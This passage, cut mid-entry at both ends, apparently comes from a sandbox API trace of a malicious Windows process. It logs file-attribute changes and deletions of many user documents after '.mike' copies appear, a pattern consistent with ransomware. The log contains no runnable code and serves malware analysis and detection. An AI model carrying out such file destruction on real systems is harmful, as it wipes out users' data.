halpmcxz\\documents\\hukn-uiba-2czgib.pptx")) returned 1 [0153.412] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.420] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JyWp1hLdRx28B.xlsx", dwFileAttributes=0x80) returned 1 [0153.421] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JyWp1hLdRx28B.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jywp1hldrx28b.xlsx")) returned 1 [0153.424] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.434] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kS0p3.pptx", dwFileAttributes=0x80) returned 1 [0153.434] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kS0p3.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ks0p3.pptx")) returned 1 [0153.438] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.445] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nrPFY_cIHQOH8qunbM.docx", dwFileAttributes=0x80) returned 1 [0153.446] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nrPFY_cIHQOH8qunbM.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nrpfy_cihqoh8qunbm.docx")) returned 1 [0153.449] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OoUT0wT8J.pptx.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OoUT0wT8J.pptx.mike", lpFilePart=0x0) returned 0x3b [0153.455] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OoUT0wT8J.pptx", dwFileAttributes=0x80) returned 1 [0153.456] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OoUT0wT8J.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oout0wt8j.pptx")) returned 1 [0153.459] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.464] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p8e7lyeG.docx", dwFileAttributes=0x80) returned 1 [0153.464] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p8e7lyeG.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p8e7lyeg.docx")) returned 1 [0153.468] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.477] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Sjl_cE9aFJtJU.pptx", dwFileAttributes=0x80) returned 1 [0153.477] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Sjl_cE9aFJtJU.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sjl_ce9afjtju.pptx")) returned 1 [0153.481] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.486] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WjffJkV7RZf9-Y.xlsx", dwFileAttributes=0x80) returned 1 [0153.487] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WjffJkV7RZf9-Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wjffjkv7rzf9-y.xlsx")) returned 1 [0153.490] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.499] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XAh43x.xlsx", dwFileAttributes=0x80) returned 1 [0153.499] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XAh43x.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xah43x.xlsx")) returned 1 [0153.503] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.509] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XwNDV3C-J2ZAx.xls", dwFileAttributes=0x80) returned 1 [0153.510] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XwNDV3C-J2ZAx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xwndv3c-j2zax.xls")) returned 1 [0153.513] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.520] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YG7ISF.pptx", dwFileAttributes=0x80) returned 1 [0153.521] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YG7ISF.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yg7isf.pptx")) returned 1 [0153.525] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.529] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zMlFUJyJW.ots", dwFileAttributes=0x80) returned 1 [0153.530] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zMlFUJyJW.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zmlfujyjw.ots")) returned 1 [0153.533] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.540] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_N479LXGNf.pps", dwFileAttributes=0x80) returned 1 [0153.540] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_N479LXGNf.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_n479lxgnf.pps")) returned 1 [0153.552] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.552] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.552] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.552] CoTaskMemFree (pv=0x508980) [0153.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.555] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.555] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.565] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\5Qxw2A9l.pptx", dwFileAttributes=0x80) returned 1 [0153.565] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\5Qxw2A9l.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\5qxw2a9l.pptx")) returned 1 [0153.568] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.575] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\JTmSs8VbF2WejV.xls", dwFileAttributes=0x80) returned 1 [0153.576] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\JTmSs8VbF2WejV.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\jtmss8vbf2wejv.xls")) returned 1 [0153.579] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.585] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\k2bCl2fftX99eWdLQv.odp", dwFileAttributes=0x80) returned 1 [0153.585] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\k2bCl2fftX99eWdLQv.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\k2bcl2fftx99ewdlqv.odp")) returned 1 [0153.588] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.599] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\t3yDnCX0.odp", dwFileAttributes=0x80) returned 1 [0153.599] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\t3yDnCX0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\t3ydncx0.odp")) returned 1 [0153.605] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.605] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.605] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.606] CoTaskMemFree (pv=0x508980) [0153.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.608] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.608] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.615] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\cf6GRRZ51MHhr\\33Mrma9Ge34b9JXlU6AE.ots", dwFileAttributes=0x80) returned 1 [0153.616] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\cf6GRRZ51MHhr\\33Mrma9Ge34b9JXlU6AE.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\cf6grrz51mhhr\\33mrma9ge34b9jxlu6ae.ots")) returned 1 [0153.619] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.625] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\cf6GRRZ51MHhr\\3vDH1Swlmabeo.doc", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\cf6GRRZ51MHhr\\3vDH1Swlmabeo.doc", lpFilePart=0x0) returned 0x53 [0153.625] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\cf6GRRZ51MHhr\\3vDH1Swlmabeo.doc", dwFileAttributes=0x80) returned 1 [0153.626] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\cf6GRRZ51MHhr\\3vDH1Swlmabeo.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\cf6grrz51mhhr\\3vdh1swlmabeo.doc")) returned 1 [0153.629] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.636] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\cf6GRRZ51MHhr\\jXgDvdkwn72.ppt", dwFileAttributes=0x80) returned 1 [0153.636] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\cf6GRRZ51MHhr\\jXgDvdkwn72.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\cf6grrz51mhhr\\jxgdvdkwn72.ppt")) returned 1 [0153.641] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.641] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.641] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.641] CoTaskMemFree (pv=0x508980) [0153.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.644] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.645] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.650] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\GzwKyLv5f2WnwBr.xlsx", dwFileAttributes=0x80) returned 1 [0153.651] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\GzwKyLv5f2WnwBr.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\gzwkylv5f2wnwbr.xlsx")) returned 1 [0153.654] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.660] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\icR-6OCAlgef0m_0.pps", dwFileAttributes=0x80) returned 1 [0153.660] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\icR-6OCAlgef0m_0.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\icr-6ocalgef0m_0.pps")) returned 1 [0153.663] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.672] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\isQempcYc.pps", dwFileAttributes=0x80) returned 1 [0153.672] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\isQempcYc.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\isqempcyc.pps")) returned 1 [0153.675] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.683] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\N1Em Aiw.ots", dwFileAttributes=0x80) returned 1 [0153.683] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\N1Em Aiw.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\n1em aiw.ots")) returned 1 [0153.686] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.696] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\QhF6zQm_Bxo0V709cZ3G.odt", dwFileAttributes=0x80) returned 1 [0153.696] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\QhF6zQm_Bxo0V709cZ3G.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\qhf6zqm_bxo0v709cz3g.odt")) returned 1 [0153.700] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.706] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\qjeVgCnxSo6JNI iG.xls", dwFileAttributes=0x80) returned 1 [0153.707] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\qjeVgCnxSo6JNI iG.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\qjevgcnxso6jni ig.xls")) returned 1 [0153.710] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.715] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\ULwhC0QfEu.pdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\ULwhC0QfEu.pdf.mike", lpFilePart=0x0) returned 0x56 [0153.719] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\ULwhC0QfEu.pdf", dwFileAttributes=0x80) returned 1 [0153.720] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\ULwhC0QfEu.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\ulwhc0qfeu.pdf")) returned 1 [0153.734] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.734] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.734] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.734] CoTaskMemFree (pv=0x508980) [0153.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.738] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.738] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.746] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\b4u 8.ots", dwFileAttributes=0x80) returned 1 [0153.747] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\b4u 8.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\b4u 8.ots")) returned 1 [0153.750] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.759] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\eM xNObhytpC5.ppt", dwFileAttributes=0x80) returned 1 [0153.760] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\eM xNObhytpC5.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\em xnobhytpc5.ppt")) returned 1 [0153.763] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.769] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\gt_VL6mW.pdf", dwFileAttributes=0x80) returned 1 [0153.770] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\gt_VL6mW.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\gt_vl6mw.pdf")) returned 1 [0153.773] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.782] SetFileAttributesW 